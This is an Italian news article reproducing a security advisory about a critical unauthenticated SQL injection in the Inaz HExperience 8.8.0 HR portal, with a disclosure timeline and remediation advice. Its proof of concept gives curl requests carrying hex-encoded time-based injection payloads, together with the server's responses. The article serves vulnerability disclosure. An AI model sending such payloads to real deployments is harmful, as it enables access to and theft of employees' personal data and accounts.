Redazione RHC : 8 Settembre 2022 09:49
L’ Offensive Security Team di Swascan ha identificato 1 vulnerabilità sull’applicazione web Inaz HExperience v.8.8.0. La vulnerabilità è stata risolta nella versione 8.9.0.
INAZ è l’azienda italiana specializzata in software e soluzioni per amministrare, gestire e organizzare il lavoro.
Progetta, produce e commercializza prodotti, strumenti e servizi che danno valore alle persone e mettono in moto le organizzazioni. INAZ continua a fare ricerca ed innovazione, collabora con università, promuove partnerships con aziende che sviluppano prodotti nuovi ed originali.
PARTE LA PROMO ESTATE -40%
RedHotCyber Academy lancia una promozione esclusiva e a tempo limitato per chi vuole investire nella propria crescita professionale nel mondo della tecnologia e della cybersecurity!
Approfitta del 40% di sconto sull’acquisto congiunto di 3 corsi da te scelti dalla nostra Academy. Ad esempio potresti fare un percorso formativo includendo Cyber Threat intelligence + NIS2 + Criptovalute con lo sconto del 40%. Tutto questo lo potrai fruire, dove e quando vuoi e con la massima flessibilità, grazie a lezioni di massimo 30 minuti ciascuna.
Contattaci tramite WhatsApp al 375 593 1011 per richiedere ulteriori informazioni oppure scriviti alla casella di posta [email protected]
Inaz HExperience piattaforma HR web-based, integra e armonizza soluzioni, strumenti e informazioni che aiutano tutti a lavorare meglio.
HExperience facilita la gestione dei talenti, la collaborazione e le forme innovative di organizzazione. La piattaforma HExperience è costituita da un database potente su cui s’innestano i moduli operativi necessari a ogni azienda.
L’Offensive Security Team di Swascan ha riscontrato una importante vulnerabilità sul prodotto Inaz HExperience v8.8.0:
| Vulnerability | CVSSv3.1 | CVSSv3.1 Base Vector |
| Stacked SQL injection (non autenticata) | 9.8 – Critical | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Nella sezione seguente vengono forniti dettagli tecnici sulla vulnerabilità ed una POSC (proof-of-concept). Questa vulnerabilità può interessare centinaia di dispositivi connessi a Internet.
In Inaz HExperience versione 8.8.0, un potenziale attaccante sarà in grado di accedere da remoto, senza alcuna autenticazione necessaria, alle informazioni contenute nel database ed eseguire operazioni come l’esfiltrazione e la modifica di account utente e amministrativi, di ottenere informazioni personali degli utenti (PII) e altro ancora.
Nella PoC seguente, a dimostrazione della presenza della vulnerabilità, viene illustrata l’esecuzione della SQL Injection in Microsoft SQL Server, tramite tecnica time-based:
$ time curl -kis -X POST -d
"ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc=
31273b57414954464f522044454c41592027303a303a35272d2d"
https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto 'UserHR.cand_est' non è
valido.
SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE
cod_fisc_caes = '1';WAITFOR DELAY '0:0:5'--'
real 0m5,649s
user 0m0,026s
sys 0m0,000s
$ time curl -kis -X POST -d
"ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc=
31273b57414954464f522044454c41592027303a303a3130272d2d"
https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto 'UserHR.cand_est' non è
valido.
SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE
cod_fisc_caes = '1';WAITFOR DELAY '0:0:10'--'
real 0m10,655s
user 0m0,019s
sys 0m0,005s
$ time curl -kis -X POST -d
"ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc=
31273b57414954464f522044454c41592027303a303a3135272d2d"
https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto 'UserHR.cand_est' non è
valido.
SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE
cod_fisc_caes = '1';WAITFOR DELAY '0:0:15'--'
real 0m15,819s
user 0m0,021s
sys 0m0,009s
Se sfruttata correttamente, questa vulnerabilità potrebbe comportare l’acquisizione dei diritti di amministratore locale, con conseguente accesso a tutte le funzionalità del portale. In alcuni casi potrebbe essere possibile eseguire comandi sul sistema operativo remoto.
Aggiornare l’applicativo INAZ HEXPERIENCE alla versione 8.10.2.
07-04-2022: Vulnerabilità scoperta
07-04-2022: INAZ contattato via e-mail (1a volta, nessuna risposta)
15-04-2022: INAZ contattato via e-mail (2a volta, il vendor risponde)
20-04-2022: INAZ chiede un approfondimento tecnico via call
27-04-2022: Call per approfondimento tecnico
23-05-2022: INAZ rilascia una patch (nuova versione HEXPERIENCE v8.9.0)
30-06-2022: Swascan invia una bozza del Security Advisory a INAZ
19-07-2022: INAZ approva il documento di disclosure
08-09-2022: Swascan pubblica la vulnerabilità
https://cwe.mitre.org/data/definitions/89.html
https://www.owasp.org/index.php/SQL_Injection
https://owasp.org/Top10/A03_2021-Injection/
Redazione“Il sistema di difesa militare Skynet entrerà in funzione il 4 agosto 1997. Comincerà ad autoistruirsi imparando a ritmo esponenziale e diverrà autocosciente alle 2:14 del giorno...
Un nuovo strumento per disabilitare i sistemi EDR è apparso nell’ambiente dei criminali informatici , che gli esperti di Sophos ritengono essere un’estensione dell’utility ED...
Una vulnerabilità di WinRAR recentemente chiusa monitorata con il codice CVE-2025-8088 è stata sfruttata in attacchi di phishing mirati prima del rilascio della patch. Il problema era un Dir...
Alla conferenza Black Hat di Las Vegas, VisionSpace Technologies ha dimostrato che è molto più facile ed economico disattivare un satellite o modificarne la traiettoria rispetto all’u...
Una falla di sicurezza cruciale nell’HTTP/1.1 è stata resa pubblica dagli esperti di sicurezza, mettendo in luce una minaccia che continua ad impattare sull’infrastruttura web da pi...
